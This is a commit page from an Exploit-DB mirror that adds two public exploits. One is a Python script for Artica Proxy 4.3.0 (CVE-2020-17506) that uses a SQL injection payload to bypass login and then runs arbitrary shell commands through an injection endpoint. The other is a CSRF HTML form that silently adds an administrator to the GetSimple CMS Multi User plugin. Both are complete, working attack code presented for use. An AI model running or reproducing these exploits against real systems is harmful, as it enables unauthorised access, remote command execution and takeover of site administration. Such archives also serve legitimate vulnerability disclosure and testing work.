bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-08-14

Browse source 
2 changes to exploits/shellcodes

Artica Proxy 4.3.0 - Authentication Bypass
GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security 2020-08-14 05:01:50 +00:00
parent a999edcbb6
commit e3b25a25ca
3 changed files with 87 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

52
exploits/hardware/webapps/48744.py Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506
import requests
import argparse
from bs4 import BeautifulSoup
def bypass_auth(session, args):
login_endpoint = "/fw.login.php?apikey="
payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
print("[+] Bypassing authentication...")
session.get(args.host + login_endpoint + payload, verify=False)
return session
def run_command(session, args):
cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
print("[+] Running command: {}".format(args.command))
response = session.post(args.host + cmd_endpoint, verify=False)
soup = BeautifulSoup(response.text, "html.parser")
print(soup.find_all("code")[1].get_text())
def main():
parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
parser.add_argument(
"--host", help="The host to target. Format example: https://host:port",
)
parser.add_argument("--command", help="The command to run")
args = parser.parse_args()
if not args.host or not args.command:
parser.print_help()
exit(0)
session = requests.Session()
session = bypass_auth(session, args)
run_command(session, args)
if __name__ == "__main__":
main()

33
exploits/php/webapps/48745.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: August 2020-08-12
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
# Version: 1.8.2
# Tested On: Windows 10 Pro + XAMPP
# CWE-352: Cross-Site Request Forgery (CSRF)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.
## Usage:
+ Change <IP||DOMAIN> to target IP address or domain name
+ Change <ADMIN> to target username
+ Change <PASSWORD> to target password
## CSRF POST Form Method
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
<input type="hidden" name="usernamec" value="<ADMIN>" />
<input type="hidden" name="useremail" value="ADMIN&#64;DOMAIN&#46;LOCAL" />
<input type="hidden" name="ntimezone" value="" />
<input type="hidden" name="userlng" value="en&#95;US" />
<input type="hidden" name="userpassword" value="<PASSWORD>" />
<input type="hidden" name="usereditor" value="1" />
<input type="hidden" name="Landing" value="" />
<input type="hidden" name="add&#45;user" value="Add&#32;New&#32;User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

2
files_exploits.csv
View file

@ -42985,3 +42985,5 @@ id,file,description,date,author,type,platform,port
48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php, 48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,
48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php, 48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php,
48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php, 48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,
48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware,
48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,

Can't render this file because it is too large.